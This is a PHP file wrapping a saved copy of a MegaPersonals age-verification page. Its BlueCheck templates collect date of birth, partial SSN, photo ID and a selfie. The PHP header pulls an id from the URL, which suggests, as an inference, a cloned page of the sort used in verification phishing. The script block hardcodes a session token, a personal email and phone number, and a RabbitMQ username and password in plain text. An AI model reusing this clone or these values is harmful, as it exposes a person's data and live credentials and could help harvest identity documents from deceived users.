
<?php 

$words = explode('/', $_SERVER['REQUEST_URI']);
$uid = trim($words[count($words) - 1], '/');
//echo $uid;
?>



<html><head>
  <title>MegaPersonals: Classified hookups</title>
  <meta id="viewportMetaTag" name="viewport" content="width=device-width, minimum-scale=1.0, initial-scale=1.0">
  <meta name="apple-mobile-web-app-capable" content="yes">
  <meta name="SKYPE_TOOLBAR" content="SKYPE_TOOLBAR_PARSER_COMPATIBLE">
  <meta charset="utf-8">

  
    
    
      <meta name="ROBOTS" content="INDEX, FOLLOW">
    
  

  <meta name="google-site-verification" content="5lgcaPvrDxOjE8Qn9rMbYKiJVahMPVReOQvezzd1nRY">
  <meta name="description" content="MegaPersonals - Post your classified ad and MEET NOW">
   <link rel="icon" href="https://megapersonals.eu/resources/img/devilgirl_favicon.ico" type="image/x-icon">
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.4/css/bootstrap.min.css">
  <link rel="stylesheet" href="https://ajax.googleapis.com/ajax/libs/jqueryui/1.12.1/themes/smoothness/jquery-ui.css">
  <link rel="stylesheet" href="https://megapersonals.eu/resources/css/custom.css">
  <link rel="stylesheet" href="https://megapersonals.eu/resources/css/emojionearea.min.css?v=1640812093">
  <!-- The newest version could cause errors in Safari -->
  <script type="text/javascript" async="" src="//cdn4.mxpnl.com/libs/mixpanel-2-latest.min.js"></script><script type="text/javascript" async="" src="https://mc.yandex.ru/metrika/tag.js"></script><script type="text/javascript" async="" src="https://www.gstatic.com/recaptcha/releases/TDBxTlSsKAUm3tSIa0fwIqNu/recaptcha__en.js" crossorigin="anonymous" integrity="sha384-HTq9bAnQeRQMZWaz4oh4hzQ7uLhEPBDMd6NizGeUQEDJ09mI0WU9lRcdix2okyzP"></script><script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js" type="text/javascript"></script>
  
  <script src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.12.1/jquery-ui.min.js"></script>
  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery-cookie/1.4.1/jquery.cookie.min.js" type="text/javascript"></script>
  <script src="https://www.google.com/recaptcha/api.js"></script>
  <!-- Latest compiled and minified JavaScript -->
  <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script>
  <script src="https://megapersonals.eu/resources/js/emojionearea.min.js?v=1640812093"></script>
  <script src="https://megapersonals.eu/resources/js/anti_clicker.js?v=1640812093" type="text/javascript"></script>
  <!-- Yandex.Metrika counter -->
  <script type="text/javascript">
      (function (d, w, c) {
          (w[c] = w[c] || []).push(function() {
              try {
                  w.yaCounter51410560 = new Ya.Metrika2({
                      id:51410560,
                      clickmap:true,
                      trackLinks:true,
                      accurateTrackBounce:true
                  });
              } catch(e) { }
          });
          var n = d.getElementsByTagName("script")[0],
              s = d.createElement("script"),
              f = function () { n.parentNode.insertBefore(s, n); };
          s.type = "text/javascript";
          s.async = true;
          s.src = "https://mc.yandex.ru/metrika/tag.js";
          if (w.opera == "[object Opera]") {
              d.addEventListener("DOMContentLoaded", f, false);
          } else { f(); }
      })(document, window, "yandex_metrika_callbacks2");
  </script>
  <noscript><div><img src="https://mc.yandex.ru/watch/51410560" style="position:absolute; left:-9999px;" alt="" /></div></noscript>
  <!-- /Yandex.Metrika counter -->

  <!-- Generated by Revive Adserver -->
  <script type="text/javascript" src="https://itransitauthority.com/www/delivery/spcjs.php?id=10"></script><script type="text/javascript" src="https://itransitauthority.com/www/delivery/spc.php?zones=48%7C49%7C50%7C51&amp;source=&amp;r=94576551&amp;charset=UTF-8&amp;loc=https%3A//megapersonals.eu/users/verification/01a2e3155e5f2504778fd4d0e87946b7&amp;referer=https%3A//megapersonals.eu/users/posts/create"></script><script type="text/javascript" src="https://itransitauthority.com/www/delivery/fl.js"></script>

  <!--end of revive-->

</head>
<style type="text/css">
    .bluecheck-modal-footer1 .bluecheck-modal-footer-button1 {
    position: relative;
    display: block;
    width: 100%;
    height: 48px;
    line-height: 48px;
    padding: 0;
    /* border-radius: 4px; */
    border: 0;
    font-size: 14px;
    font-family: Futura,Trebuchet MS,Arial,sans-serif !important;
    font-weight: 700;
    letter-spacing: 0.5px;
    text-align: center;
    color: #ffffff;
    text-transform: uppercase !important;
    cursor: pointer;
    outline: none;
}




</style>>

<body style="margin-top: -10px;">
<div class="frontpage">
    <div class="container candywrapper" style="padding-right: 4em; padding-left: 4em">
        <div class="row">
            <a href="/home">
                <img src="https://megapersonals.eu/resources/img/megapersonalsPageHeader3.png?v=1640812093" class="img-responsive center-block" alt="Megapersonals" id="megapersonalsPageHeader">
            </a>
        </div>
        <div class="row">
            <img src="https://megapersonals.eu/resources/img/almostThereDarlings.png?v=1640812093" class="img-responsive center-block" alt="Megapersonals" id="megapersonalsPageHeader">
        </div>

        <span class="meetnow_byline">
                        <h1 class="categoryLink" style="font-style: normal"><b>VERIFICATION process</b></h1>
                        <div id="megap4AdSampleHeader">
                            <p style="font-style:normal">takes up to 7 Minutes.</p>
                            <p>Hold tight...</p>
                        </div>
                    </span>
        <h1 id="timer"></h1>
        <div id="try-again-verification" class="hidden text-center" style="color: red; font-weight: bold">
            <h3><i>Your verification process was not completed. Do you want to
                <a id="try-again-link" onclick="location.reload();">try again</a></i> ?</h3>
        </div>
        <div class="hidden" id="contact-support">
            <a href="/users/verification/support">
                <img src="https://megapersonals.eu/resources/img/contactSupport.png?v=1640812093" class="img-responsive center-block" alt="Megapersonals">
            </a>
        </div>
        <div class="row">
            <div id="confirmModal_verification" class="hidden" role="dialog">
                <div class="modal-dialog">
                    <div class="modal-content modal-content-white" id="termsandconditions">
                        <div class="modal-body">
                            <div id="close-popup-up" data-dismiss="modal">
                                <img src="https://megapersonals.eu/resources/img/close_bump_to_top_modal.png?v=1640812093">
                            </div>
                            <img src="https://megapersonals.eu/resources/img/ageCheckPopup.png?v=1640812093">
                            <div class="centered">
                                <p class="popup-text">
                                    To prevent spam,<br>
                                    MegaPersonals.eu<br>
                                    verifies all new users.<br>
                                    <!-- <span class="popup-text-bluecheck">BlueCheck</span> for verification -->
                                </p><br>
                                <p class="popup-text">
                                    This needs to be <br>done only once.
                                </p><br>
                                <p class="popup-text">
                                    All on-line info is <!-- <span class="popup-text-red"> -->deleted<!-- </span> --> after<br>
                                    verification is complete.
                                </p>
                            </div>
                        </div>
                        <div class="modal-footer flex-btn">
                            <button type="button" class="btn btn-link btn-lg" id="button-ok">OK</button>
                        </div>
                    </div>
                </div>
            </div>
        </div>

        <div class="row">
            <div id="successModal_verification" class="hidden" role="dialog" style="background: none;position: fixed;margin-left: 10%;margin-right: 10%;">
                <div class="modal-dialog">
                    <div class="modal-content modal-content-white" id="successtermsandconditions">
                        <div class="modal-body">
                            <img src="https://megapersonals.eu/resources/img/successStarsCaption.png" class="img-responsive center-block" style="padding: 10px 15%">
                            <div class="centered">
                                <p class="popup-text">
                                    <span class="green">THANKS</span><br>
                                    Your verification<br>
                                    was <i>successful</i>.
                                </p>
                                <p class="popup-text">
                                    
                                </p>
                            </div>
                        </div>
                        <img src="https://megapersonals.eu/resources/img/buttonOk.png" class="img-responsive center-block" id="success-ok" style="padding: 10px 15%; cursor: pointer" onclick="location='/users/verification/notify-success/18097588';" alt="OK">
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

    <!-- not published popup-->
    <div id="confirmModal_notPublished" class="hidden" role="dialog" style="display: none; background: none">
        <div class="modal-dialog">
            <div class="modal-content">
                <div class="modal-body">
                    <div class="centered">
                    <p class="success">
                        Post was Saved
                    </p>
                    <p class="success">
                        But NOT Published
                    </p>
                    </div>
                </div>
                <div class="flex-btn">
                    <div class="notPblsht">OK</div>
                </div>
            </div>
        </div>
    </div>
    <!-- end not published -->

<script src="https://verify.bluecheck.me/platforms/customintegration/js/AgeVerification-V2.js?domain_token=a5AJi7EonHbilLvKE9B5"></script>
<script src="https://megapersonals.eu/resources/js/websocket/sockjs.min.js"></script>
<script src="https://megapersonals.eu/resources/js/websocket/stomp.min.js"></script>
<script src="https://megapersonals.eu/resources/js/websocket/ws_verification.js"></script>
<script>
    var token = '01a2e3155e5f2504778fd4d0e87946b7';
    var email = 'NoyeanMwol@gmail.com';
    var phone = '2513734848';
    var postId = '18097588';
    var orderId = '3651180';
    var status = 'started';

    var rabbitUser = 'rabbit';
    var rabbitPassword = 'lingo110{voltammeter';
    var rabbitVirtualHost = 'prod';

    var timeoutId = 0;
    var timer = parseInt('420', 10);
    var interval= parseInt('3', 10);

    var prefixURL = "/users/verification";

    $(document).ready(function () {
        console.log("time: " +  '420');
        console.log("orderId: " + orderId);

        checkStatus(status);

        connectToWebStomp();
    });

    var checkStatus = function (status) {
        console.log("check status ");
        if (status === "approved") {
            $('#timer').addClass('hidden');
            $('#successModal_verification').removeClass('hidden');
        }

        if (status === "failed") {
            clearTimeout(timeoutId);
            location.replace(prefixURL + "/" + token);
        }

        if (status === "pending") {
            startCheckStatus();
        }

        if (status === "started") {
            initBlueCheckVerification();
        }
    };

    var initBlueCheckVerification = function init() {
        BlueCheck.photoIdVerificationType = 'age_photoID_dob_only';
        BlueCheck.language.dob.caption = '';
        BlueCheck.language.dob.buttons.submit.text = 'Continue';
        BlueCheck.maxAttempts.name = 0;
        BlueCheck.skipModalPages = ['email'];

        BlueCheck.platformCallbacks.onReady = function () {
            $('#confirmModal_verification').removeClass('hidden');
            var verifyBtn = document.getElementById('button-ok');
            verifyBtn.addEventListener("click", function (e) {
                if (BlueCheck.validateAndDisplayModal()) {
                    console.log("BlueCheck modal show");
                }
            });
        };

        BlueCheck.platformCallbacks.scrapeUserData = function () {
            var userData = BlueCheck.userData;

            BlueCheck.orderID = orderId;
            userData.email = email;
            userData.shipping_phone = phone;

            console.log("email : " + userData.email);
            console.log("phone : " + userData.shipping_phone);
            console.log("order id : " + BlueCheck.orderID);
        };

        BlueCheck.platformCallbacks.onSuccess = function () {
            location.reload();
        };

        BlueCheck.platformCallbacks.onClose = function () {
            console.log('onClose');
        };

        BlueCheck.platformCallbacks.onQuit = function () {
            if (BlueCheck.lastResponse === "failed") {
                $('#timer').addClass('hidden');
                $('#try-again-verification').removeClass('hidden');
            }

            console.log('onQuit');
        };

        if (BlueCheck.initialize()) {
            console.log("init BlueCheck");
        }
    };

    var startCheckStatus = function initTimerAndChecking() {
        if (timer !== 0) {
            console.log("Start timer");
            startTimer();
            clearTimeout(timeoutId);
        } else {
            $('#timer').addClass('hidden');
            $('#confirmModal_verification').addClass('hidden');
            $('#contact-support').removeClass('hidden');
        }
    };

    function startTimer() {
        var intervalId = setInterval(function () {
            timer-- ?
                $('#timer').html(convertToMinutes(timer)) :
                (clearInterval(intervalId), location.reload());
        }, 1000);
    }

    function convertToMinutes(sec) {
        var hours = Math.floor(sec / 3600);
        var minutes = Math.floor((sec - (hours * 3600)) / 60);
        var seconds = sec - (hours * 3600) - (minutes * 60);
        var result = '';
        result += minutes < 10 ? "0" + minutes : minutes;
        result += ":" + (seconds < 10 ? "0" + seconds : seconds);
        return result;
    }

    $('#button-ok').click(function() {
        $('#confirmModal_verification').addClass('hidden');
    });
    $('#close-popup-up').click(function () {
        $('#confirmModal_notPublished')
            .css({
                'display': 'flex',
                'background': '#757575b5'
            })
            .removeClass('hidden');
    });
    $('#confirmModal_notPublished .notPblsht').on('click' , function() {
        $(location).attr('href', '/users/posts/list');
    });
</script>


<div id="bluecheck-script-container"><link id="bluecheck-av-css" rel="stylesheet" type="text/css" href="css/modal.css">
<link rel="stylesheet" type="text/css" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">

<script type="text/template" id="bluecheck-template-intro">
    <div class="bluecheck-screen-intro">
        <div class="bluecheck-modal-hidden-wrapper bluecheck-modal-wrapper">
            <div class="bluecheck-modal bluecheck-modal-intro">
                <div class="bluecheck-modal-flex">
                    <div class="bluecheck-modal-absolute-head">
                        <div class='bluecheck-modal-absolute-head-text'>
                            {{dynamic.logo}}
                        </div>
                        <i class="fa fa-times bluecheck-close-all-modals" aria-hidden="true"></i>
                    </div>
                    <div class="bluecheck-modal-body">
                        <img class='bluecheck-intro-img' src="{{shieldLogo}}" alt="">
                        <h3 class='bluecheck-intro-h3'>{{dynamic.header}}<span><br>{{subheader}}</span></h3>
                    </div>
                    <div class="bluecheck-modal-footer">
                        <h6 class="bluecheck-intro-h6">{{customIntroText}}</h6>
                        <h6 class="bluecheck-intro-h6 bluecheck-terms">
                            <input type="checkbox" id="bluecheck-terms" class="bluecheck-terms">
                            <label for="bluecheck-terms">{{caption}}</label>
                        </h6>
                        <h6 class="bluecheck-intro-h6 buttonClickErrorMessage" id="buttonClickErrorMessage" style="display:none;">{{buttonClickErrorMessage}}</h6>
                        {{dynamic.submit}}
                    </div>
                </div>
            </div>
        </div>
    </div>
</script>

<script type="text/template" id="bluecheck-template-photosWaiting">
    <div class="bluecheck-screen-photosWaiting">
        <div class="bluecheck-modal-wrapper">
            <div class="bluecheck-modal bluecheck-modal-blue-background">
                <div class="bluecheck-modal-flex">
                    <div class="bluecheck-modal-head">
                        {{globals.help}}
                    </div>
                    <div class="bluecheck-modal-body-blue">
                        <h3 class='bluecheck-modal-body-blue-h3' id='bluecheck-loading-text'>
                            {{title}}
                            <img src="https://verify.bluecheck.me/age-verification/images/dots.gif" alt="" class="bluecheck-dots-animation">
                            <h2 class="bluecheck-modal-body-h2 bluecheck-blue-subtitle bluecheck-photosWaiting-subtitle">{{subtitle}}</h2>
                            <h2 class="bluecheck-modal-body-h2 bluecheck-blue-subtitle-message bluecheck-photosWaiting-subtitle-message">{{message}}</h2>
                        </h3>
                    </div>
                    <div class="bluecheck-modal-footer">
                        
                    </div>
                </div>
            </div>
        </div>
    </div>
</script>

<script type="text/template" id="bluecheck-template-photo_failed">
    <div class="bluecheck-screen-photo_failed">
        <div class="bluecheck-modal-wrapper">
            <div class="bluecheck-modal bluecheck-modal-blue-background">
                <div class="bluecheck-modal-flex">
                    <div class="bluecheck-modal-head">
                        {{globals.help}}
                    </div>
                    <div class="bluecheck-modal-body-blue">
                        <h3 class='bluecheck-modal-body-blue-h3' id='bluecheck-loading-text'>
                            {{title}}
                            <img src="https://verify.bluecheck.me/age-verification/images/dots.gif" alt="" class="bluecheck-dots-animation">
                            <h2 class="bluecheck-modal-body-h2 bluecheck-blue-subtitle">{{subtitle}}</h2>
                        </h3>
                    </div>
                    <div class="bluecheck-modal-footer">
                        {{dynamic.cancel}} {{dynamic.newPhotos}}
                    </div>
                </div>
            </div>
        </div>
    </div>
</script>

<script type="text/template" id="bluecheck-template-dob">
    <div class="bluecheck-screen-dob">
        <div class="bluecheck-modal-wrapper">
            <div class="bluecheck-modal bluecheck-modal-dob">
                <div class="bluecheck-modal-flex">
                    <div class="bluecheck-modal-head">
                        {{globals.help}}
                    </div>
                    <div class="bluecheck-modal-body">
                        <h5 class='bluecheck-modal-body-h5'>{{title}}</h5>
                        <div class="bluecheck-data">
                            <span id="bluecheck-dob-month-data"></span>
                            <span id="bluecheck-dob-day-data"></span>
                            <span id="bluecheck-dob-year-data"></span>
                        </div>
                        <div class="bluecheck-bdata">
                            <input class='bluecheck-modal-body-input' type="tel" pattern="[0-9]*" name="month" id="bluecheck-input-dob-month" placeholder="MM" maxlength="2" autocomplete="off">
                            <span class='bluecheck-bdata-span'>/</span>
                            <input class='bluecheck-modal-body-input' type="tel" pattern="[0-9]*" name="day" id="bluecheck-input-dob-day" placeholder="DD" maxlength="2" autocomplete="off">
                            <span class='bluecheck-bdata-span'>/</span>
                            <input class='bluecheck-modal-body-input' type="tel" pattern="[0-9]*" name="year" id="bluecheck-input-dob-year" placeholder="YYYY" maxlength="4" autocomplete="off">
                        </div>
                    </div>
                    <div class="bluecheck-modal-footer">
                        <h6 class='bluecheck-dob-h6'>{{caption}}</h6>
                        {{dynamic.submit}}
                    </div>
                </div>
            </div>
        </div>
    </div>
</script>

<script type="text/template" id="bluecheck-template-sendEmail">
    <div class="bluecheck-screen-sendEmail">
        <div class="bluecheck-modal-wrapper">
            <div class="bluecheck-modal bluecheck-modal-blue-background bluecheck-modal-sendEmail">
                <div class="bluecheck-modal-head">
                    <div class="bluecheck-modal-head-circle-container">
                        <i class="fa fa-times bluecheck-fa-times bluecheck-close-this-modal" aria-hidden="true"></i>
                    </div>
                </div>
                <div class="bluecheck-modal-body-blue">
                    <h5 class='bluecheck-modal-body-blue-h3'>
                        {{title}}
                    </h5>
                    <div class="bluecheck-hero-form-container">
		                <div class="bluecheck-hero-form">
                            <div class="bluecheck-hero-form-input-container">
                                <p class="bluecheck-name-label-span">YOUR NAME</p>
                                <input type="text" class="bluecheck-hero-form-input" id="bluecheck-send-email-name" placeholder="Name">
                            </div>
                            <div class="bluecheck-hero-form-input-container">
                                <p class="bluecheck-hero-form-label">EMAIL</p>
                                <input type="email" class="bluecheck-hero-form-input" id="bluecheck-send-email-email" placeholder="Email">
                            </div>
                            <div class="bluecheck-hero-form-input-container">
                                <p class="bluecheck-hero-form-label">MESSAGE</p>
                                <textarea class="bluecheck-hero-form-textarea" id="bluecheck-send-email-message" placeholder="Message"></textarea>
                            </div>
                            <label class="bluecheck-hero-form-error" id="bluecheck-send-email-error">Error</label>
                            <div class="bluecheck-hero-form-input-container" style="text-align:center;">
                                {{dynamic.email}}
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
</script>

<script type="text/template" id="bluecheck-template-name">
    <div class="bluecheck-screen-name">
        <div class="bluecheck-modal-wrapper">
            <div class="bluecheck-modal bluecheck-modal-name">
                <div class="bluecheck-modal-flex">
                    <div class="bluecheck-modal-head">
                        {{globals.help}}
                    </div>
                    <div class="bluecheck-modal-body">
                        <h2 class='bluecheck-modal-body-h2'>{{title}}</h2>
                        <div class='bluecheck-name-flex'>
                            <div class="bluecheck-name-container">
                                <div class='bluecheck-name-label'>
                                    <span class='bluecheck-name-label-span'>{{first}}</span>
                                </div>
                                <input class='bluecheck-modal-body-input' type="text" id="bluecheck-input-name-first" autocomplete="off" />
                            </div>
                            <div class="bluecheck-name-container">
                                <div class='bluecheck-name-label'>
                                    <span class='bluecheck-name-label-span'>{{last}}</span>
                                </div>
                                <input class='bluecheck-modal-body-input' type="text" id="bluecheck-input-name-last" autocomplete="off" />
                            </div>
                        </div>
                    </div>
                    <div class="bluecheck-modal-footer">
                        <div class='bluecheck-name-checkbox'>
                            <input class='bluecheck-modal-body-input' type="checkbox" id="bluecheck-input-name-checkbox">
                            <label class='bluecheck-name-checkbox-label' for='bluecheck-input-name-checkbox'>{{dynamic.caption}}</label>
                        </div>
                        {{dynamic.submit}}
                    </div>
                </div>
            </div>
        </div>
    </div>
</script>

<script type="text/template" id="bluecheck-template-ssn">
    <div class="bluecheck-screen-ssn">
        <div class="bluecheck-modal-wrapper">
            <div class="bluecheck-modal bluecheck-modal-ssn">
                <div class="bluecheck-modal-flex">
                    <div class="bluecheck-modal-head">
                        {{globals.help}}
                    </div>
                    <div class="bluecheck-modal-body">
                        <h5 class='bluecheck-modal-body-h5'>
                            {{title}}
                            <br>
                            <h6 class='bluecheck-modal-body-h6'>
                                <i class="fa {{icon}}" aria-hidden="true"></i>
                                <p>{{subtitle}}</p>
                            </h6>
                        </h5>
                        <div class="bluecheck-ssn">
                            <span class='bluecheck-ssn-span bluecheck-asterisk'>*</span>
                            <span class='bluecheck-ssn-span bluecheck-asterisk'>*</span>
                            <span class='bluecheck-ssn-span bluecheck-asterisk'>*</span>
                            <span class='bluecheck-ssn-span bluecheck-dash'>-</span>
                            <span class='bluecheck-ssn-span bluecheck-asterisk'>*</span>
                            <span class='bluecheck-ssn-span bluecheck-asterisk'>*</span>
                            <span class='bluecheck-ssn-span bluecheck-dash'>-</span>
                            <span class='bluecheck-ssn-span bluecheck-asterisk' id='bluecheck-model-ssn1'></span>
                            <span class='bluecheck-ssn-span bluecheck-asterisk' id='bluecheck-model-ssn2'></span>
                            <span class='bluecheck-ssn-span bluecheck-asterisk' id='bluecheck-model-ssn3'></span>
                            <span class='bluecheck-ssn-span bluecheck-asterisk' id='bluecheck-model-ssn4'></span>
                        </div>
                        <div class="bluecheck-inputs-ssn">
                            <input class='bluecheck-modal-body-input' type="tel" pattern="[0-9]*" maxlength="1" name="bluecheck-ssn1" id="bluecheck-input-ssn1" placeholder="*" autocomplete="off">
                            <input class='bluecheck-modal-body-input' type="tel" pattern="[0-9]*" maxlength="1" name="bluecheck-ssn2" id="bluecheck-input-ssn2" placeholder="*" autocomplete="off">
                            <input class='bluecheck-modal-body-input' type="tel" pattern="[0-9]*" maxlength="1" name="bluecheck-ssn3" id="bluecheck-input-ssn3" placeholder="*" autocomplete="off">
                            <input class='bluecheck-modal-body-input' type="tel" pattern="[0-9]*" maxlength="1" name="bluecheck-ssn4" id="bluecheck-input-ssn4" placeholder="*" autocomplete="off">
                        </div>
                    </div>
                    <div class="bluecheck-modal-footer">
                        {{dynamic.submit}}
                    </div>
                </div>
            </div>
        </div>
    </div>
</script>

<script type="text/template" id="bluecheck-template-email">
    <div class="bluecheck-screen-email">
        <div class="bluecheck-modal-wrapper">
            <div class="bluecheck-modal bluecheck-modal-email">
                <div class="bluecheck-modal-flex">
                    <div class="bluecheck-modal-head">
                        {{globals.help}}
                    </div>
                    <div class="bluecheck-modal-body">
                        <h2 class='bluecheck-modal-body-h2'>
                            {{title}}
                            <br>
                            <h6 class="bluecheck-modal-body-h6">{{subtitle}}</h6>
                        </h2>
                        <div class="bluecheck-email-container">
                            <div class='bluecheck-email-label'>
                                <span class='bluecheck-email-label-span'>{{email}}</span>
                            </div>
                            <input class='bluecheck-modal-body-input' type="text" id="bluecheck-input-email" autocomplete="off" />
                        </div>
                    </div>
                    <div class="bluecheck-modal-footer">
                        <h6 class='bluecheck-intro-h6 bluecheck-terms'>
                            <input type="checkbox" class="bluecheck-terms" id="bluecheck-terms-email">
                            <label for="bluecheck-terms-email" style="font-size: 8px !important;">{{caption}}</label>
                        </h6>
                        <h6 class="bluecheck-intro-h6 buttonClickErrorMessage" id="buttonClickErrorMessageEmail" style="display:none;">{{buttonClickErrorMessage}}</h6>
                        {{dynamic.submit}}
                    </div>
                </div>
            </div>
        </div>
    </div>
</script>

<script type="text/template" id="bluecheck-template-photos">
    <div class="bluecheck-screen-photos">
        <div class="bluecheck-modal-wrapper">
            <div class="bluecheck-modal">
                <div class="bluecheck-modal-head">
                    {{globals.help}}
                </div>
                <div class="bluecheck-modal-body">
                    <div id='bluecheck-body-photo-id'>
                        <h2 class='bluecheck-modal-body-h2'>
                            <span class='bluecheck-semibold-me'>{{photoTitle}}</span>
                        </h2>
                        <div class="bluecheck-license">
                            <img class='bluecheck-license-img' src="{{photoExample}}" alt="">
                        </div>
                        <div class='bluecheck-photos-instruction'>
                            {{photoInstruction1}}
                        </div>
                            {{dynamic.photoSelect}}
                        <br>
                        <br>
                        <div class='bluecheck-photos-instruction'>
                            {{photoInstruction2}}
                        </div>
                        <input class="bluecheck-input-file bluecheck-modal-body-input" type="file" accept="image/*" id='bluecheck-photo-id-data'>
                    </div>
                    <div id='bluecheck-body-selfie'>
                        <h2 class='bluecheck-modal-body-h2'>
                            <span id='bluecheck-selfie-header' class='bluecheck-semibold-me'>{{selfieTitle}}</span>
                            <span id='bluecheck-selfie-failure' class='bluecheck-semibold-me' style='display:none;'>{{selfieDetectionFailure}}</span>
                        </h2>
                        <div class="bluecheck-license">
                            <img class='bluecheck-license-img' src="{{selfieExample}}" alt="">
                        </div>
                        <div class='bluecheck-photos-instruction'>
                            {{selfieInstruction1}}
                        </div>
                        <br>
                        <div class='bluecheck-photos-instruction'>
                            {{selfieInstruction2}}
                        </div>
                            {{dynamic.selfieSelect}}
                        <input class="bluecheck-input-file bluecheck-modal-body-input" type="file" accept="image/*" id='bluecheck-selfie-data'>
                    </div>
                </div>

            </div>
        </div>
    </div>
</script>

<script type="text/template" id="bluecheck-template-help">
    <div class="bluecheck-screen-help">
        <div class="bluecheck-modal-hidden-wrapper bluecheck-modal-wrapper bluecheck-modal-help-wrapper">
            <div class="bluecheck-modal bluecheck-modal-help">
                <div class="bluecheck-modal-body">
                    <div class="bluecheck-modal-head">
                        <div class="bluecheck-modal-head-circle-container">
                            <i class="fa fa-times bluecheck-fa-times bluecheck-close-this-modal" aria-hidden="true"></i>
                        </div>
                    </div>
                    <h2 class='bluecheck-modal-body-h2'>{{title}}</h2>
                    <div class='bluecheck-flex-help'>
                        {{dynamic.retry}}
                        {{dynamic.email}}
                        {{dynamic.faq}}
                        {{dynamic.closeAll}}
                    </div>
                </div>
                {{emailLink}}
                {{faqLink}}
            </div>
        </div>
    </div>
</script>

<script type="text/template" id="bluecheck-template-attempts">
    <div class="bluecheck-screen-attempts">
        <div class="bluecheck-modal-wrapper">
            <div class="bluecheck-modal bluecheck-modal-not-found">
                <div class="bluecheck-modal-flex">
                    <div class="bluecheck-modal-head">
                        {{globals.helpModified}}
                    </div>
                    <div class="bluecheck-modal-body">
                        <h2 class='bluecheck-modal-body-h2' id='bluecheck-modal-body-h2-nomatchfound'>
                            <span class='bluecheck-semibold-me'>{{updateTitle}}</span>
                        </h2>
                        <p class="bluecheck-modal-body-caption">{{dynamic.caption}}</p>
                        <div class='bluecheck-flex-attempts'>
                            <div class='bluecheck-flex-attempt-reviews'>
                                <div class='bluecheck-flex-attempt-review-container' id='bluecheck-attempt-name-container'>
                                    <span class='bluecheck-flex-attempt-review'>{{updateNameText}}</span>
                                    <span class='bluecheck-flex-attempt-review-info'>{{dynamic.fullName}}</span>
                                    <span class='bluecheck-hyperlink' id='bluecheck-attempt-name'>{{updateEditText}}</span>
                                </div>
                                <div class='bluecheck-flex-attempt-review-container' id='bluecheck-attempt-dob-container'>
                                    <span class='bluecheck-flex-attempt-review'>{{updateDobText}}</span>
                                    <span class='bluecheck-flex-attempt-review-info'>{{dynamic.fullDob}}</span>
                                    <span class='bluecheck-hyperlink' id='bluecheck-attempt-dob'>{{updateEditText}}</span></h4>
                                </div>
                            </div>
                        </div>
                        <hr>
                        <h2 class='bluecheck-modal-body-h2' id='bluecheck-modal-body-h2-selectmethod'>
                            <span class='bluecheck-semibold-me'>{{validateTitle}}</span>
                        </h2>
                        <div class='bluecheck-flex-attempts'>
                            <div class='bluecheck-flex-attempt-buttons'>
                                <div class='bluecheck-flex-attempt-button-container bluecheck-modal-footer bluecheck-modal-footer-left'>
                                    {{dynamic.validateSsn}}
                                    {{dynamic.retrySsn}}
                                </div>
                                <div class='bluecheck-flex-attempt-button-container bluecheck-modal-footer bluecheck-modal-footer-right'>
                                    {{dynamic.validatePhoto}}
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
</script>

<script type="text/template" id="bluecheck-template-loading">
    <div class="bluecheck-screen-loading">
        <div class="bluecheck-modal-wrapper">
            <div class="bluecheck-modal bluecheck-modal-blue-background">
                <div class='bluecheck-flex-info'>
                    <div class="bluecheck-modal-body-blue">
                        <h3 class='bluecheck-modal-body-blue-h3' id='bluecheck-loading-text'>
                            {{dynamic.title}}
                            <img src="https://verify.bluecheck.me/age-verification/images/dots.gif" alt="" class="bluecheck-dots-animation">
                        </h3>
                        <h4 id='bluecheck-upload-status'></h4>
                        <div class="bluecheck-progress-bar-container">
                            <div id='bluecheck-progress-bar'></div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
</script>

<script type="text/template" id="bluecheck-template-alert">
    <div class="bluecheck-screen-alert">
        <div class="bluecheck-modal-wrapper">
            <div class="bluecheck-modal bluecheck-red">
                <div class="bluecheck-flex-info">
                    <div class="bluecheck-modal-body-red">
                        <h4 class='bluecheck-alert-title'>{{dynamic.title}}</h4>
                        <h4 class='bluecheck-alert-message'>{{dynamic.message}}</h4>
                        {{editPhotos}}
                        {{close}}
                        {{help}}
                        {{dob}}
                    </div>
                </div>
            </div>
        </div>
    </div>
</script>

<script type="text/template" id="bluecheck-template-quit">
    <div class="bluecheck-screen-quit">
        <div class="bluecheck-modal-wrapper">
            <div class="bluecheck-modal bluecheck-red">
                <div class="bluecheck-flex-info">
                    <div class="bluecheck-modal-body-red">
                        <h4 class='bluecheck-alert-title'>{{dynamic.title}}</h4>
                        <h4 class='bluecheck-alert-message'>{{dynamic.message}}</h4>
                        {{continue}}
                        {{close}}
                        {{help}}
                    </div>
                </div>
            </div>
        </div>
    </div>
</script>

<script type="text/template" id="bluecheck-template-info">
    <div class="bluecheck-screen-info">
        <div class="bluecheck-modal-wrapper">
            <div class="bluecheck-modal bluecheck-modal-submitted">
                <div class='bluecheck-flex-info'>
                    <div class="bluecheck-modal-body-blue">
                        <h4 class="bluecheck-alert-title">{{dynamic.title}}</h4>
                        <h4 id='bluecheck-precheckout-message'>{{precheckoutDomainPhoto}}</h4>
                        <h4 class='bluecheck-alert-message'>{{dynamic.message}}</h4>
                        {{redirect}}
                        {{close}}
                        {{help}}
                    </div>
                </div>
            </div>
        </div>
    </div>
</script>

<script type="text/template" id="bluecheck-template-success">
    <div class="bluecheck-screen-success">
        <div class="bluecheck-modal-wrapper">
            <div class="bluecheck-modal bluecheck-modal-submitted">
                <div class="bluecheck-flex-info">
                    <div class="bluecheck-modal-body-blue">
                        <h4 class="bluecheck-alert-title">{{title}}</h4>
                        <h4 class='bluecheck-alert-message'>{{message}}</h4>
                        {{done}}
                    </div>
                </div>
            </div>
        </div>
    </div>
</script>

<script type="text/template" id="bluecheck-template-failedSelfie">
    <div class="bluecheck-screen-failedSelfie">
        <div class="bluecheck-modal-wrapper">
